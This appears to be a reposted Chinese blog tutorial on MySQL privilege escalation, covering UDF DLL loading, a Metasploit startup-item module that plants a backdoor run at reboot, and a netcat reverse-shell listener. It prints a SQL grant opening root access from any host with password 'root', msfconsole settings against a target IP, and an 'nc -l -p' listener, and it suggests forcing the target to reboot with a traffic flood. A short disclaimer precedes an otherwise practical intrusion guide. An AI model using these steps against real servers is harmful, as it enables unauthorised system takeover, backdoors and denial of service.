当前位置: 首页 > article >正文

权限提升:Mysql 数据库 .(UDF || 启动项 || 反弹)

权限提升:Mysql 数据库.

权限提升简称提权,由于操作系统都是多用户操作系统用户之间都有权限控制,比如通过 Web 漏洞拿到的是 Web 进程的权限,往往 Web 服务都是以一个权限很低的账号启动的,因此通过 Webshell 进行一些操作会受到限制,这就需要将其提升为管理甚至是 System 权限。通常通过操作系统漏洞或操作系统的错误配置进行提权,也可以通过第三方软件服务,如数据库或 FTP 等软件的漏洞进行提权。


目录:

提权思想:

Mysql 数据库提权:

UDF 提权:

                第一步:服务探针.(端口)

                第二步:信息收集.

                第三步:提权利用.

启动项提权:

第一步:开启外连.

第二步:使用 msf 对 数据库 进行提权.

第三步:目标主机重启,则就会启用后门.(怎么重启目标主机,可以使用流量攻击.)

反弹提权:

第一步:在攻击机进行监听

第二步:上传 Mysql 提权工具,以后进行访问.

第三步:创建反弹函数.

 第四步:执行监听.

第五步:返回 kali 查看已经返回成功.


免责声明:

严禁利用本文章中所提到的技术进行非法攻击,否则后果自负,上传者不承担任何责任。


提权思想:

在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件: 服务器开启数据库服务及获取到最高权限用户密码。除 Access 数据库外,其他数据库基本都存在数 据库提权的可能.

流程:服务探针-信息收集-提权利用-获取权限


Mysql 数据库提权:

提权是我们已经有木马或其他的方法连接到web网站的目录了.

数据库的默认端口信息:

1、MySql数据库 ,默认端口是: 3306;

2、Oracle数据库 ,默认端口号为:1521;

3、Sql Server数据库 ,默认端口号为:1433;

4、DB2数据库, 默认端口号为:5000;

5、PostgreSQL数据库, 默认端口号为:5432;

6、国产的DM达梦数据库, 默认端口号为:5236;

7、Redis数据库,默认端口号:6379;

8、Memcached数据库,默认端口号:11211;

9、MongoDB数据库,默认端口号:27017;

UDF 提权:

第一步:服务探针.(端口)


第二步:信息收集.

(1)读取网站数据库配置文件(了解其命名规则及查找技巧

查看数据库配置文件的关键字:

sql,data,inc,config,conn,database,common,include.....


(2)读取数据库存储或备份文件(了解其数据库存储格式及对应内容


第三步:提权利用.

提权的第一步要知道数据库的版本号:

(1)mysql<5.1    导出目录 c:/windows 或 system32

(2)mysql=>5.1   导出安装目录/lib/plugin/


(1)查看数据库的安装目录

select @@basedir;


(2)复制安装目录,进行访问点击 lib 文件.


 (3)点击创建 plugin 目录.(因为 mysql=>5.1 所以要创建这个目录.


(4)复制 plugin 目录的 URL.


(5)然后点安装DLL,然后再点击自己要执行的命令.


(6)提高权限,添加管理员.(这里因为我添加了二次,所以返回的结果已存在.


启动项提权:

导出自定义可执行文件到启动目录配合重启执行
将创建好的后门或执行文件进行服务器启动项写入,配合重启执行!

第一步:开启外连.

GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION;


第二步:使用 msf 对 数据库 进行提权.

msfconsole


use exploit/windows/mysql/mysql_start_up        //使用外连模块.


show options            //查看需要配置的模块


set rhosts 192.168.0.102            //设置目标主机 IP 地址.
set username root                     //设置数据库用户名.
set password root                    //设置数据库的密码.
run            //执行模块上传.

第三步:目标主机重启,则就会启用后门.(怎么重启目标主机,可以使用流量攻击.


反弹提权:

第一步:在攻击机进行监听

nc -l -p 5577


第二步:上传 Mysql 提权工具,以后进行访问.


第三步:创建反弹函数.


 第四步:执行监听.


第五步:返回 kali 查看已经返回成功.

    

    

解决安装DLL:https://www.cnblogs.com/awrrays/p/11371522.html


http://www.kler.cn/news/16631.html

相关文章:

  • Midjourney 创建私人画图机器人,共享账号如何设置独立绘画服务器(保姆级教程)
  • 【学习笔记】「JOISC 2022 Day3」洒水器
  • 【数学建模】Day01——层次分析法
  • Java中的StringBuffer 和 StringBuilder 类
  • BM53-缺失的第一个正整数
  • 【6. 激光雷达接入ROS】
  • Java集合框架与ArrayList、LinkedList的区别
  • 操作系统——操作系统逻辑结构
  • Hbase数据库完全分布式搭建以及java中操作Hbase
  • Opencv识别车牌
  • 多级缓存建设方案
  • PHP图片上传代码怎么写和代码的用发
  • vue3表单输入绑定
  • DDD系列:三、Repository模式
  • C++项目中打破循环依赖的锁链:实用方法大全
  • 【Java校招面试】基础知识(二)——Spring Framework AOP
  • java stream 实践篇
  • day1_内存区域
  • 枚举法计算24点游戏
  • C++Primer第五版【阅读笔记】
  • LeetCode 560. 和为 K 的子数组
  • kettle不同数据源的字段不一致的合并后插入数据库
  • 如何使用快速排序算法对整数数组进行就地排序?
  • 从4k到42k,软件测试工程师的涨薪史,给我看哭了
  • 我的医学预测模型评价步骤(仅供参考)
  • SmartEngine流程引擎之Custom模式
  • ApplicationContextAware接口
  • ETL工具 - Kettle 输入输出算子介绍
  • MyBatisPlus代码生成器使用
  • Linux Ansible角色介绍